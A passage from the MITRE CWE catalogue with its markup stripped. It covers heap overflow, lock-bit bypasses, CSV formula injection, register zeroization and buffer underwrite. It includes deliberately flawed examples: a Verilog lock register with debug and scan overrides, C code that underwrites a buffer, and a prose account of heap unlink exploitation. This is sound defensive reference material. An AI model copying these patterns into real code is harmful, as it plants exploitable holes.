buf2 can be overwritten, buf2 itself can be overwritten as well. + The allocation header will generally keep a linked list of memory "chunks". Particularly, there may be a "previous" chunk and a "next" chunk. Here, the previous chunk for buf2 will probably be buf1, and the next chunk may be null. When the free() occurs, most memory allocators will rewrite the linked list using data from buf2. Particularly, the "next" chunk for buf1 will be updated and the "previous" chunk for any subsequent chunk will be updated. The attacker can insert a memory address for the "next" chunk and a value to write into that memory address for the "previous" chunk. + This could be used to overwrite a function pointer that gets dereferenced later, replacing it with a memory address that the attacker has legitimate access to, where they have placed malicious code, resulting in arbitrary code execution. + + + + + Write-what-where condition + + + ARR30-C + Do not form or use out-of-bounds pointers or array subscripts + Imprecise + + + ARR38-C + Guarantee that library functions do not form invalid pointers + Imprecise + + + STR31-C + Guarantee that storage for strings has sufficient space for character data and the null terminator + Imprecise + + + STR32-C + Do not pass a non-null-terminated character sequence to a library function that expects a string + Imprecise + + + SFP8 + Faulty Buffer Access + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2008-11-24 + updated Common_Consequences, Other_Notes + + + CWE Content Team + MITRE + 2009-01-12 + updated Common_Consequences + + + CWE Content Team + MITRE + 2009-05-27 + updated Relationships + + + CWE Content Team + MITRE + 2010-12-13 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2013-02-21 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Causal_Nature, Common_Consequences, Demonstrative_Examples, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2019-09-19 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated References + + + CWE Content Team + MITRE + 2022-10-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product prevents direct access to a resource containing sensitive information, but it does not sufficiently limit access to metadata that is derived from the original, sensitive information. + + Developers might correctly prevent unauthorized access to a database or other resource containing sensitive information, but they might not consider that portions of the original information might also be recorded in metadata, search indices, statistical reports, or other resources. If these resources are not also restricted, then attackers might be able to extract some or all of the original information, or otherwise infer some details. For example, an attacker could specify search terms that are known to be unique to a particular person, or view metadata such as activity or creation dates in order to identify usage patterns. + + + + + + + + + + + + Architecture and Design + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2020-01-26 + 4.0 + 2020-02-24 + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product uses a trusted lock bit for restricting access to registers, address regions, or other resources, but the product does not prevent the value of the lock bit from being modified after it has been set. + + In integrated circuits and hardware + intellectual property (IP) cores, device configuration + controls are commonly programmed after a device power + reset by a trusted firmware or software module (e.g., + BIOS/bootloader) and then locked from any further + modification. + + This behavior is commonly implemented using a trusted lock bit. + When set, the lock bit disables writes to a protected set of + registers or address regions. Design or coding errors in + the implementation of the lock bit protection feature + may allow the lock bit to be modified or cleared by + software after it has been set. Attackers might be able to unlock the system and + features that the bit is intended to protect. + + + + + + + Primary + + + + + + + + + + + Architecture and Design + Such issues could be introduced during hardware architecture and design and identified later during Testing or System Configuration phases. + + + Implementation + Such issues could be introduced during implementation and identified later during Testing or System Configuration phases. + + + + + Access Control + Modify Memory + High + Registers protected by lock bit can be modified even when lock is set. + + + + + Manual Analysis + Set the lock bit. Power cycle the + device. Attempt to clear the lock bit. If the + information is changed, implement a design + fix. Retest. Also, attempt to indirectly clear the lock + bit or bypass it. + High + + + + + Architecture and Design + Implementation + Testing + + + Security lock bit protections must be reviewed for design inconsistency and common weaknesses. + Security lock programming flow and lock properties must be tested in pre-silicon and post-silicon testing. + + + High + + + + + Consider the example design below for a digital thermal sensor that detects overheating of the silicon and triggers system shutdown. The system critical temperature limit (CRITICAL_TEMP_LIMIT) and thermal sensor calibration (TEMP_SENSOR_CALIB) data have to be programmed by firmware, and then the register needs to be locked (TEMP_SENSOR_LOCK). + + + + Register + Field description + + + CRITICAL_TEMP_LIMIT + [31:8] Reserved field; Read only; Default 0[7:0] Critical temp 0-255 Centigrade; Read-write-lock; Default 125 + + + TEMP_SENSOR_CALIB + [31:0] Thermal sensor calibration data. Slope value used to map sensor reading to degrees Centigrade. + + + TEMP_SENSOR_LOCK + [31:1] Reserved field; Read only; Default 0[0] Lock bit, locks CRITICAL_TEMP_LIMIT and TEMP_SENSOR_CALIB registers; Write-1-once; Default 0 + + + TEMP_HW_SHUTDOWN + [31:2] Reserved field; Read only; Default 0[1] Enable hardware shutdown on critical temperature detection; Read-write; Default 0 + + + CURRENT_TEMP + [31:8] Reserved field; Read only; Default 0[7:0] Current Temp 0-255 Centigrade; Read-only; Default 0 + + + + In this example, note that if the system heats to critical temperature, the response of the system is controlled by the TEMP_HW_SHUTDOWN bit [1], which is not lockable. Thus, the intended security property of the critical temperature sensor cannot be fully protected, since software can misconfigure the TEMP_HW_SHUTDOWN register even after the lock bit is set to disable the shutdown response. + + To fix this weakness, one could change the TEMP_HW_SHUTDOWN field to be locked by TEMP_SENSOR_LOCK. + + + TEMP_HW_SHUTDOWN + [31:2] Reserved field; Read only; Default 0 [1] Enable hardware shutdown on critical temperature detection; Read-write-Lock; Default 0[0] Locked by TEMP_SENSOR_LOCK + + + + + + + + CVE-2017-6283 + chip reset clears critical read/write lock permissions for RSA function + https://www.cve.org/CVERecord?id=CVE-2017-6283 + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi + Intel Corporation + 2020-01-15 + 4.0 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-06-25 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2020-08-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2021-10-28 + updated Demonstrative_Examples, Description, Detection_Factors, Name, Observed_Examples, Potential_Mitigations, Relationships, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2022-04-28 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + Narasimha Kumar V Mangipudi + Lattice Semiconductor + 2021-10-20 + reviewed content changes + + + Hareesh Khattri + Intel Corporation + 2021-10-22 + provided observed example + + Improper Implementation of Lock Protection Registers + + + + Register lock bit protection disables changes to system configuration once the bit is set. Some of the protected registers or lock bits become programmable after power state transitions (e.g., Entry and wake from low power sleep modes) causing the system configuration to be changeable. + + Devices may allow device configuration controls which need to be programmed after device power reset via a trusted firmware or software module (commonly set by BIOS/bootloader) and then locked from any further modification. This action is commonly implemented using a programmable lock bit, which, when set, disables writes to a protected set of registers or address regions. + After a power state transition, the lock bit is set to unlocked. Some common weaknesses that can exist in such a protection scheme are that the lock gets cleared, the values of the protected registers get reset, or the lock become programmable. + + + + + + + + + + + + + Architecture and Design + + + Implementation + + + + + Access Control + Modify Memory + High + + + + + Architecture and Design + Implementation + Testing + + + Security Lock bit protections should be reviewed for behavior across supported power state transitions. + Security lock programming flow and lock properties should be tested in pre-silicon and post-silicon testing including testing across power transitions. + + + High + + + + + + Consider the memory configuration settings of a system that uses DDR3 DRAM memory. Protecting the DRAM memory configuration from modification by software is required to ensure that system memory access control protections cannot be bypassed. This can be done by using lock bit protection that locks all of the memory configuration registers. The memory configuration lock can be set by the BIOS during the boot process. + If such a system also supports a rapid power on mode like hibernate, the DRAM data must be saved to a disk before power is removed and restored back to the DRAM once the system powers back up and before the OS resumes operation after returning from hibernate. + + To support the hibernate transition back to the operating state, the DRAM memory configuration must be reprogrammed even though it was locked previously. As the hibernate resume does a partial reboot, the memory configuration could be altered before the memory lock is set. Functionally the hibernate resume flow requires a bypass of the lock-based protection. The memory configuration must be securely stored and restored by trusted system firmware. Lock settings and system configuration must be restored to the same state it was in before the device entered into the hibernate mode. + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi + Intel Corporation + 2020-01-15 + 4.0 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-08-20 + updated Common_Consequences, Demonstrative_Examples, Description, Modes_of_Introduction, Potential_Mitigations, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2021-03-15 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product uses a register lock bit protection mechanism, but it does not ensure that the lock bit prevents modification of system registers or controls that perform changes to important hardware system configuration. + + Integrated circuits and hardware intellectual properties (IPs) might provide device configuration controls that need to be programmed after device power reset by a trusted firmware or software module, commonly set by BIOS/bootloader. After reset, there can be an expectation that the controls cannot be used to perform any further modification. This behavior is commonly implemented using a trusted lock bit, which can be set to disable writes to a protected set of registers or address regions. The lock protection is intended to prevent modification of certain system configuration (e.g., memory/memory protection unit configuration). + However, if the lock bit does not effectively write-protect all system registers or controls that could modify the protected system configuration, then an adversary may be able to use software to access the registers/controls and modify the protected hardware configuration. + + + + + + + + Primary + + + + + + + + + + + Architecture and Design + Such issues could be introduced during hardware architecture and design and identified later during Testing or System Configuration phases. + + + Implementation + Such issues could be introduced during implementation and identified later during Testing or System Configuration phases. + + + + + Access Control + Modify Memory + System Configuration protected by the lock bit can be modified even when the lock is set. + + + + + Manual Analysis + Set the lock bit. Attempt to modify the + information protected by the lock bit. If the information + is changed, implement a design fix. Retest. Also, attempt + to indirectly clear the lock bit or bypass + it. + High + + + + + Architecture and Design + Implementation + Testing + + + Security lock bit protections must be reviewed for design inconsistency and common weaknesses. + Security lock programming flow and lock properties must be tested in pre-silicon and post-silicon testing. + + + + + + + Consider the example design below for a digital thermal sensor that detects overheating of the silicon and triggers system shutdown. The system critical temperature limit (CRITICAL_TEMP_LIMIT) and thermal sensor calibration (TEMP_SENSOR_CALIB) data have to be programmed by the firmware. + + + + + Register + Field description + + + CRITICAL_TEMP_LIMIT + + [31:8] Reserved field; Read only; Default 0[7:0] Critical temp 0-255 Centigrade; Read-write-lock; Default 125 + + + + TEMP_SENSOR_CALIB + + [31:0] Thermal sensor calibration data. A slope value used to map sensor reading to a degree Centigrade. Read-write; Default 25 + + + + TEMP_SENSOR_LOCK + + [31:1] Reserved field; Read only; Default 0[0] Lock bit, locks CRITICAL_TEMP_LIMIT register; Write-1-once; Default 0 + + + + TEMP_HW_SHUTDOWN + + [31:2] Reserved field; Read only; Default 0[1] Enable hardware shutdown on a critical temperature detection; Read-write; Default 0 + + + + CURRENT_TEMP + + [31:8] Reserved field; Read only; Default 0[7:0] Current Temp 0-255 Centigrade; Read-only; Default 0 + + + + + + In this example note that only the CRITICAL_TEMP_LIMIT register is protected by the TEMP_SENSOR_LOCK bit, while the security design intent is to protect any modification of the critical temperature detection and response. + + The response of the system, if the system heats to a critical temperature, is controlled by TEMP_HW_SHUTDOWN bit [1], which is not lockable. Also, the TEMP_SENSOR_CALIB register is not protected by the lock bit. + + By modifying the temperature sensor calibration, the conversion of the sensor data to a degree centigrade can be changed, such that the current temperature will never be detected to exceed critical temperature value programmed by the protected lock. + + Similarly, by modifying the TEMP_HW_SHUTDOWN.Enable bit, the system response detection of the current temperature exceeding critical temperature can be disabled. + + + Change TEMP_HW_SHUTDOWN and TEMP_SENSOR_CALIB controls to be locked by TEMP_SENSOR_LOCK. + + + + TEMP_SENSOR_CALIB + + [31:0] Thermal sensor calibration data. A slope value used to map sensor reading to a degree Centigrade. Read-write-Lock; Default 25; Locked by TEMP_SENSOR_LOCK bit[0] + + + + TEMP_HW_SHUTDOWN + + [31:2] Reserved field; Read only; Default 0[1] Enable hardware shutdown on critical temperature detection; Read-write-Lock; Default 0; Locked by TEMP_SENSOR_LOCK bit[0] + + + + + + + + + CVE-2018-9085 + Certain servers leave a write protection lock bit + unset after boot, potentially allowing modification of + parts of flash memory. + https://www.cve.org/CVERecord?id=CVE-2018-9085 + + + CVE-2014-8273 + Chain: chipset has a race condition (CWE-362) between when an interrupt handler detects an attempt to write-enable the BIOS (in violation of the lock bit), and when the handler resets the write-enable bit back to 0, allowing attackers to issue BIOS writes during the timing window [REF-1237]. + https://www.cve.org/CVERecord?id=CVE-2014-8273 + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi + Intel Corporation + 2020-01-15 + 4.0 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-08-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2021-03-15 + updated Maintenance_Notes + + + CWE Content Team + MITRE + 2021-10-28 + updated Demonstrative_Examples, Description, Detection_Factors, Maintenance_Notes, Name, Observed_Examples, Potential_Mitigations, References, Relationships, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2022-04-28 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + Narasimha Kumar V Mangipudi + Lattice Semiconductor + 2021-10-20 + reviewed content changes + + Improper Hardware Lock Protection for Security Sensitive Controls + + + + System configuration protection may be bypassed during debug mode. + + Device configuration controls are commonly programmed after a device power reset by a trusted firmware or software module (e.g., BIOS/bootloader) and then locked from any further modification. This is commonly implemented using a trusted lock bit, which when set, disables writes to a protected set of registers or address regions. The lock protection is intended to prevent modification of certain system configuration (e.g., memory/memory protection unit configuration). If debug features supported by hardware or internal modes/system states are supported in the hardware design, modification of the lock protection may be allowed allowing access and modification of configuration information. + + + + + + + + + + + + + Architecture and Design + + + Implementation + + + + + Access Control + Bypass Protection Mechanism + High + Bypass of lock bit allows access and modification of system configuration even when the lock bit is set. + + + + + Architecture and Design + Implementation + Testing + + + Security Lock bit protections should be reviewed for any bypass/override modes supported. + Any supported override modes either should be removed or protected using authenticated debug modes. + Security lock programming flow and lock properties should be tested in pre-silicon and post-silicon testing. + + + High + + + + + + For example, consider the example Locked_override_register example. This register module supports a lock mode that blocks any writes after lock is set to 1. + + However, it also allows override of the lock protection when scan_mode or debug_unlocked modes are active. + + + module Locked_register_example + ( + input [15:0] Data_in, + input Clk, + input resetn, + input write, + input Lock, + input scan_mode, + input debug_unlocked, + output reg [15:0] Data_out + ); + + reg lock_status; + + always @(posedge Clk or negedge resetn) + + if (~resetn) // Register is reset resetn + begin + + lock_status <= 1'b0; + + end + else if (Lock) + begin + + lock_status <= 1'b1; + + end + else if (~Lock) + begin + + lock_status <= lock_status + + end + + always @(posedge Clk or negedge resetn) + + if (~resetn) // Register is reset resetn + begin + + Data_out <= 16'h0000; + + end + else if (write & (~lock_status | scan_mode | debug_unlocked) ) // Register protected by Lock bit input, overrides supported for scan_mode & debug_unlocked + begin + + Data_out <= Data_in; + + end + else if (~write) + begin + + Data_out <= Data_out; + + end + + endmodule + + If either the scan_mode or the debug_unlocked modes can be triggered by software, then the lock protection may be bypassed. + + Either remove the debug and scan mode overrides or protect enabling of these modes so that only trusted and authorized users may enable these modes. + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi + Intel Corporation + 2020-01-15 + 4.0 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-08-20 + updated Common_Consequences, Demonstrative_Examples, Description, Modes_of_Introduction, Potential_Mitigations, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2022-04-28 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2022-10-13 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The code uses boxed primitives, which may introduce inefficiencies into performance-critical operations. + + Languages such as Java and C# support automatic conversion through their respective compilers from primitive types into objects of the corresponding wrapper classes, and vice versa. For example, a compiler might convert an int to Integer (called autoboxing) or an Integer to int (called unboxing). This eliminates forcing the programmer to perform these conversions manually, which makes the code cleaner. + However, this feature comes at a cost of performance and can lead to resource exhaustion and impact availability when used with generic collections. Therefore, they should not be used for scientific computing or other performance critical operations. They are only suited to support "impedance mismatch" between reference types and primitives. + + + + + + + + + + + + + + Implementation + The programmer may use boxed primitives when not strictly necessary. + + + + + Availability + DoS: Resource Consumption (CPU) + DoS: Resource Consumption (Memory) + DoS: Resource Consumption (Other) + Reduce Performance + Low + Incorrect autoboxing/unboxing would result in reduced performance, which sometimes can lead to resource consumption issues. + + + + + Implementation + Use of boxed primitives should be limited to certain situations such as when calling methods with typed parameters. Examine the use of boxed primitives prior to use. Use SparseArrays or ArrayMap instead of HashMap to avoid performance overhead. + + + + + Java has a boxed primitive for each primitive type. A long can be represented with the boxed primitive Long. Issues arise where boxed primitives are used when not strictly necessary. + + Long count = 0L; + + for (long i = 0; i < Integer.MAX_VALUE; i++) { + + count += i; + + + } + + + In the above loop, we see that the count variable is declared as a boxed primitive. This causes autoboxing on the line that increments. This causes execution to be magnitudes less performant (time and possibly space) than if the "long" primitive was used to declare the count variable, which can impact availability of a resource. + + + This code uses primitive long which fixes the issue. + + long count = 0L; + + for (long i = 0; i < Integer.MAX_VALUE; i++) { + + count += i; + + + } + + + + + + + EXP04-J + Do not pass arguments to certain Java Collections Framework methods that are a different type than the collection parameter type + + + Part 4-1 + Req SI-2 + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Joe Harvey + 2019-10-14 + 4.0 + 2020-02-24 + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + "Mapping CWE to 62443" Sub-Working Group + CWE-CAPEC ICS/OT SIG + 2023-04-25 + Suggested mappings to ISA/IEC 62443. + + + + + The product saves user-provided information into a Comma-Separated Value (CSV) file, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as a command when the file is opened by a spreadsheet product. + User-provided data is often saved to traditional databases. This data can be exported to a CSV file, which allows users to read the data using spreadsheet software such as Excel, Numbers, or Calc. This software interprets entries beginning with '=' as formulas, which are then executed by the spreadsheet software. The software's formula language often allows methods to access hyperlinks or the local command line, and frequently allows enough characters to invoke an entire script. Attackers can populate data fields which, when saved to a CSV file, may attempt information exfiltration or other malicious activity when automatically executed by the spreadsheet software. + + + + + + + + + + + + + CSV Injection + + + Formula Injection + + + Excel Macro Injection + + + + + Implementation + The weakness is in the implementation of a software's CSV export feature, in particular how it formats formula entries as the output gets flattened into a text file. + + + + + Confidentiality + Read Application Data + Execute Unauthorized Code or Commands + Low + Current versions of Excel warn users of untrusted content. + + + + + Implementation + When generating CSV output, ensure that formula-sensitive metacharacters are effectively escaped or removed from all data before storage in the resultant CSV. Risky characters include '=' (equal), '+' (plus), '-' (minus), and '@' (at). + Moderate + Unfortunately, there is no perfect solution, since different spreadsheet products act differently. + + + Implementation + If a field starts with a formula character, prepend it with a ' (single apostrophe), which prevents Excel from executing the formula. + Moderate + It is not clear how effective this mitigation is with other spreadsheet software. + + + Architecture and Design + Certain implementations of spreadsheet software might disallow formulas from executing if the file is untrusted, or if the file is not authored by the current user. + Limited + This mitigation has limited effectiveness because it often depends on end users opening spreadsheet software safely. + + + + + Hyperlinks or other commands can be executed when a cell begins with the formula identifier, '=' + + =HYPERLINK(link_location, [friendly_name]) + + Stripping the leading equals sign, or simply not executing formulas from untrusted sources, impedes malicious activity. + + HYPERLINK(link_location, [friendly_name]) + + + + + + CVE-2019-12134 + Low privileged user can trigger CSV injection through a contact form field value + https://www.cve.org/CVERecord?id=CVE-2019-12134 + + + CVE-2019-4521 + Cloud management product allows arbitrary command execution via CSV injection + https://www.cve.org/CVERecord?id=CVE-2019-4521 + + + CVE-2019-17661 + CSV injection in content management system via formula code in a first or last name + https://www.cve.org/CVERecord?id=CVE-2019-17661 + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2019-11-21 + 4.0 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The hardware product does not properly clear sensitive information from built-in registers when the user of the hardware block changes. + Hardware logic operates on data stored in registers local to the hardware block. Most hardware IPs, including cryptographic accelerators, rely on registers to buffer I/O, store intermediate values, and interface with software. The result of this is that sensitive information, such as passwords or encryption keys, can exist in locations not transparent to the user of the hardware logic. When a different entity obtains access to the IP due to a change in operating mode or conditions, the new entity can extract information belonging to the previous user if no mechanisms are in place to clear register contents. It is important to clear information stored in the hardware if a physical attack on the product is detected, or if the user of the hardware block changes. The process of clearing register contents in a hardware IP is referred to as zeroization in standards for cryptographic hardware modules such as FIPS-140-2 [REF-267]. + + + + + + + + + + + + + Architecture and Design + Lack of hardware mechanisms to zeroize or clear registers in the design or specification. + + + Implementation + Mechanisms to zeroize and clear registers are in the design but implemented incorrectly. + + + Operation + Hardware-provided zeroization mechanisms are not used appropriately by the IP user (ex. firmware), or data remanence issues are not taken into account. + + + + + Confidentiality + Varies by Context + The consequences will depend on the information disclosed due to the vulnerability. + + + + + Architecture and Design + Every register potentially containing sensitive information must have a policy specifying how and when information is cleared, in addition to clarifying if it is the responsibility of the hardware logic or IP user to initiate the zeroization procedure at the appropriate time. + Unfortunately, data disclosure can occur even after information has been overwritten/zeroized from the digital perspective. Physical characteristics of the memory can reveal the history of previously written data. For example, if the same value is written repeatedly to a memory location, the corresponding memory cells can become physically altered to a degree that even if the original data is erased it can still be recovered through physical characterization of the memory cells [REF-1055]. + + + + + Suppose a hardware IP for implementing an encryption routine works as expected, but it leaves the intermediate results in some registers that can be accessed. Exactly why this access happens is immaterial - it might be unintentional or intentional, where the designer wanted a "quick fix" for something. + + + + + + + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Nicole Fern + Tortuga Logic + 2020-02-08 + 4.0 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-08-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product writes to a buffer using an index or pointer that references a memory location prior to the beginning of the buffer. + This typically occurs when a pointer or its index is decremented to a position before the buffer, when pointer arithmetic results in a position before the beginning of the valid memory location, or when a negative index is used. + + + + + + + Primary + + + + + + + + + buffer underrun + Some prominent vendors and researchers use the term "buffer underrun". "Buffer underflow" is more commonly used, although both terms are also sometimes used to describe a buffer under-read (CWE-127). + + + + + Implementation + + + Medium + + + Integrity + Availability + Modify Memory + DoS: Crash, Exit, or Restart + Out of bounds memory access will very likely result in the corruption of relevant memory, and perhaps instructions, possibly leading to a crash. + + + Integrity + Confidentiality + Availability + Access Control + Other + Execute Unauthorized Code or Commands + Modify Memory + Bypass Protection Mechanism + Other + If the corrupted memory can be effectively controlled, it may be possible to execute arbitrary code. If the corrupted memory is data rather than instructions, the system will continue to function with improper changes, possibly in violation of an implicit or explicit policy. The consequences would only be limited by how the affected data is used, such as an adjacent memory location that is used to specify whether the user has special privileges. + + + Access Control + Other + Bypass Protection Mechanism + Other + When the consequence is arbitrary code execution, this can often be used to subvert any other security service. + + + + + Requirements + Choose a language that is not susceptible to these issues. + + + Implementation + All calculated values that are used as index or for pointer arithmetic should be validated to ensure that they are within an expected range. + + + + + In the following C/C++ example, a utility function is used to trim trailing whitespace from a character string. The function copies the input string to a local character string and uses a while statement to remove the trailing whitespace by moving backward through the string and overwriting whitespace with a NUL character. + + char* trimTrailingWhitespace(char *strMessage, int length) { + char *retMessage;char *message = malloc(sizeof(char)*(length+1)); + + // copy input string to a temporary string + char message[length+1];int index;for (index = 0; index < length; index++) {message[index] = strMessage[index];}message[index] = '\0'; + + // trim trailing whitespace + int len = index-1;while (isspace(message[len])) {message[len] = '\0';len--;} + + // return string without trailing whitespace + retMessage = message;return retMessage; + } + + However, this function can cause a buffer underwrite if the input character string contains all whitespace. On some systems the while statement will move backwards past the beginning of a character string and will call the isspace() function on an address outside of the bounds of the local buffer. + + + The following is an example of code that may result in a buffer underwrite, if find() returns a negative value to indicate that ch is not found in srcBuf: + + int main() {...strncpy(destBuf, &srcBuf[find(srcBuf, ch)], 1024);...} + + If the index to srcBuf is somehow under user control, this is an arbitrary write-what-where condition. + + + + + CVE-2021-24018 + buffer underwrite in firmware verification routine allows code execution via a crafted firmware image + https://www.cve.org/CVERecord?id=CVE-2021-24018 + + + CVE-2002-2227 + Unchecked length of SSLv2 challenge value leads to buffer underflow. + https://www.cve.org/CVERecord?id=CVE-2002-2227 + + + CVE-2007-4580 + Buffer underflow from a small size value with a large buffer (length parameter inconsistency, CWE-130) + https://www.cve.org/CVERecord?id=CVE-2007-4580 + + + CVE-2007-1584 + Buffer underflow from an all-whitespace string, which causes a counter to be decremented before the buffer while looking for a non-whitespace character. + https://www.cve.org/CVERecord?id=CVE-2007-1584 + + + CVE-2007-0886 + Buffer underflow resultant from encoded data that triggers an integer overflow. + https://www.cve.org/CVERecord?id=CVE-2007-0886 + + + CVE-2006-6171 + Product sets an incorrect buffer size limit, leading to "off-by-two" buffer underflow. + https://www.cve.org/CVERecord?id=CVE-2006-6171 + + + CVE-2006-4024 + Negative value is used in a memcpy() operation, leading to buffer underflow. + https://www.cve.org/CVERecord?id=CVE-2006-4024 + + + CVE-2004-2620 + Buffer underflow due to mishandled special characters + https://www.cve.org/CVERecord?id=CVE-2004-2620 + + + + + UNDER - Boundary beginning violation ('buffer underflow'?) + + + Buffer underwrite + + + SFP8 + Faulty Buffer Access + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This could be resultant from several errors, including a bad offset or an array index that decrements before the beginning of the buffer (see CWE-129). + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Alternate_Terms, Applicable_Platforms, Common_Consequences, Description, Relationships, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2009-01-12 + updated Common_Consequences + + + CWE Content Team + MITRE + 2009-10-29 + updated Description, Name, Relationships + + + CWE Content Team + MITRE + 2011-03-29 + updated 